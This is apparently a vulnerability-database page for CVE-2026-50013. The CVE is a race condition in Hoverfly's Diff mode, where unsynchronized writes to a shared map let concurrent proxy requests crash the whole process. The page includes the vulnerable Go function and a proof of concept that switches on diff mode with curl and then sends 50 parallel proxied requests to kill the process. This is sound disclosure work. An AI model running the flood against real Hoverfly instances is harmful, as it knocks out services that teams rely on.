CVE-2026-50013

HIGHPre-NVD 7.57.5
EchelonGraph scoreLOW confidence

This high-severity CVE scores 7.5 under the CNA's CVSS (NVD's own analysis pending). EPSS exploit-prediction score not yet available (the EPSS model rescores nightly; freshly-published CVEs typically appear within 48 hours). GitHub Security Advisory data not yet ingested — confidence will rise once GHSA publishes (typical lag: hours to days for open-source ecosystem CVEs; never for infrastructure-only CVEs).

Triggered by: NVD CVSS baseline
Sources: cna:github_m
7.5
EchelonGraph verdictPlan a fixSerious severity, but no confirmed exploitation yet.
  • High severity, but no confirmed exploitation yet
CISA-KEV: Not listedEPSS: CVSS: 7.5Exploit: NoneExposed: 0

No vendor fix yet — apply a workaround or compensating control (WAF / firewall / segmentation) and watch for a patch.

Hoverfly: Process Crash via Concurrent Map Write Race Condition in Diff Mode

Summary:

When Hoverfly is running in Diff mode, the AddDiff() function writes to the shared responsesDiff map without any synchronization (no mutex). When multiple proxy requests are processed concurrently (the normal case for any proxy), the concurrent map writes trigger Go's built-in race detector which causes a fatal error: concurrent map read and map write, immediately killing the entire Hoverfly process. This is trivially exploitable by sending multiple simultaneous requests.

Details:

1. Unsynchronized map access in AddDiff() (core/hoverfly_service.go:417-421):

func (hf *Hoverfly) AddDiff(requestView v2.SimpleRequestDefinitionView, diffReport v2.DiffReport) {
    if len(diffReport.DiffEntries) > 0 {
        diffs := hf.responsesDiff[requestView]                    // UNSYNCHRONIZED READ
        hf.responsesDiff[requestView] = append(diffs, diffReport) // UNSYNCHRONIZED WRITE
    }
}

2. This function is called from Diff mode processing, which runs concurrently per request (core/modes/diff_mode.go):

Each incoming proxy request is handled in its own goroutine by Go's net/http server. In Diff mode, each request calls AddDiff() after comparing the simulated and actual responses. With multiple concurrent requests, multiple goroutines write to the same map simultaneously.

3. Go's runtime detects concurrent map access and terminates the process:

Unlike data races on simple values (which produce undefined behavior silently), Go's map implementation includes a built-in concurrent access check. When two goroutines access the same map and at least one is writing, the runtime calls fatal() which is unrecoverable, it cannot be caught by recover().

4. No mutex protection exists on responsesDiff:

The field is declared as a plain map[v2.SimpleRequestDefinitionView][]v2.DiffReport with no associated sync.RWMutex. Compare with hf.state which properly uses sync.RWMutex for its map access.

Environment:

  • Hoverfly version: v1.12.7
  • Operating System: macOS Darwin 25.4.0
  • Go version: 1.26.2
  • Configuration: Hoverfly in Diff mode (PUT /api/v2/hoverfly/mode {"mode":"diff"})

POC:

Step 1: Start Hoverfly and set Diff mode

./hoverfly &
sleep 2

Set diff mode

curl -X PUT http://localhost:8888/api/v2/hoverfly/mode \ -H "Content-Type: application/json" \ -d '{"mode": "diff"}'

Load a simulation for diff comparison

curl -X PUT http://localhost:8888/api/v2/simulation \ -H "Content-Type: application/json" \ -d '{ "data": { "pairs": [{ "request": {"path": [{"matcher": "glob", "value": "*"}]}, "response": {"status": 200, "body": "expected"} }], "globalActions": {"delays": [], "delaysLogNormal": []} }, "meta": {"schemaVersion": "v5.2"} }'

Step 2: Send concurrent requests to trigger the race

# Send 50 concurrent requests, race condition triggers within seconds
for i in $(seq 1 50); do
    curl -s -x http://localhost:8500 "http://httpbin.org/get?id=$i" &
done
wait

Step 3: Observe the crash

# Check if process is still running
pgrep -f hoverfly

crash output on Hoverfly v1.12.7:

fatal error: concurrent map read and map write

goroutine 892 [running]: github.com/SpectoLabs/hoverfly/core.(*Hoverfly).AddDiff(...) /core/hoverfly_service.go:419 github.com/SpectoLabs/hoverfly/core/modes.(*DiffMode).Process(...)

The process crashes with ~50 concurrent requests. In production with real traffic, it crashes almost immediately.

Impact:

  • Full denial of service: The process terminates immediately and cannot be recovered without a restart
  • Trivial exploitation: Any attacker with proxy access can trigger this by sending multiple concurrent requests
  • No admin API access required: Only proxy port access is needed to trigger the crash
  • Unrecoverable: fatal error in Go cannot be caught by recover() — the process is unconditionally killed
  • Affects all Diff mode users: Any team using Diff mode for API comparison testing is vulnerable

CVSS v3
7.5
EG Score
7.5(low)
EPSS
KEV
Not listed

Published

July 14, 2026

Last Modified

July 14, 2026

Vendor Advisories for CVE-2026-50013(1)

These vendors published their own advisory mentioning this CVE — often with vendor-specific remediation steps + affected product lists not in NVD.

Data Freshness Timeline

(refreshed 3× in last 7d / 3× in last 30d)

Each row is a source pipeline that fetched or updated this CVE on that date, with what changed. For example, "NVD update" means NVD published or revised its analysis for this CVE; "MITRE cvelistV5" means we ingested or refreshed it from the CNA feed. Most recent first.

  1. 2026-07-15 20:08 UTCEG score recompute
  2. 2026-07-15 07:10 UTCEG score recompute
  3. 2026-07-14 18:10 UTCEG score recompute

Frequently asked(4)

What is CVE-2026-50013?
CVE-2026-50013 is a high vulnerability published on July 14, 2026. Hoverfly: Process Crash via Concurrent Map Write Race Condition in Diff Mode Summary: When Hoverfly is running in Diff mode, the AddDiff() function writes to the shared responsesDiff map without any synchronization (no mutex). When multiple proxy requests are processed concurrently (the normal case…
When was CVE-2026-50013 disclosed?
CVE-2026-50013 was first published in the National Vulnerability Database on July 14, 2026. EchelonGraph re-ingests CVE updates from NVD on a 2-hour cycle, so this page reflects the latest published state.
What is the CVSS score of CVE-2026-50013?
CVE-2026-50013 has a CVSS v4.0 base score of 7.5 (CNA self-assessment; NVD's own analysis pending). The EG score is currently aggregating — additional source signals are being incorporated as they become available..
How do I remediate CVE-2026-50013?
Patch to the fixed version published by the affected vendor. Where vendor advisories exist for CVE-2026-50013, EchelonGraph cross-links them in the Vendor Advisories panel below — those typically contain the canonical remediation steps, fixed version numbers, and any vendor-specific mitigations.

Dependency Blast Radius

Explore the affected products and dependency analysis for CVE-2026-50013

Explore →

Is Your Infrastructure Affected by CVE-2026-50013?

EchelonGraph automatically scans your cloud infrastructure and maps CVE exposure using blast radius analysis.